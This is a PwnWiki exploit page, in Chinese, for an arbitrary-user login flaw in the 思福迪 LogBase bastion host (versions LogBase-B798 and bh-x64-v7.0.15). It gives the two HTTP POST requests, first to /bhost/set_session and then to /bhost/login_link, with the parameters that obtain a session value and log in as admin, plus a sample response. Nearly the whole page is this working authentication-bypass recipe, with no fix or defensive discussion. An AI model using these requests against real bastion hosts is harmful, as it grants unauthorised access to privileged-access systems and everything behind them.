思福迪堡壘機任意用戶登錄漏洞

From PwnWiki
Revision as of 17:16, 15 April 2021 by Pwnwiki (talk | contribs) (Created page with "==影響範圍== LogBase-B798 bh-x64-v7.0.15 ==漏洞利用== 獲取INFO字段,u1參數值爲用戶名 <code>POST /bhost/set_session HTTP/1.1Host:xx.xx.xx.xxu1=admin&m1=<...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

影響範圍

LogBase-B798

bh-x64-v7.0.15

漏洞利用

獲取INFO字段,u1參數值爲用戶名 POST /bhost/set_session HTTP/1.1Host:xx.xx.xx.xxu1=admin&m1=獲得:

{"result":true,"info":"1562205376847","ErrMsg":""}


代入INFO字段進入如下請求a0參數值中

uCode參數值爲用戶名 

POST /bhost/login_link HTTP/1.1Host: xx.xx.xx.xxa0=1562205376847&a1=&a10=2019-01-01+10:10:10&ha=CADFDF26E649FB6284D2FD424BD294B6&uCode=admin&vdcode=

利用後可成功登錄後臺

Retrieved from "https://pwnwiki.com/index.php?title=思福迪堡壘機任意用戶登錄漏洞&oldid=1684"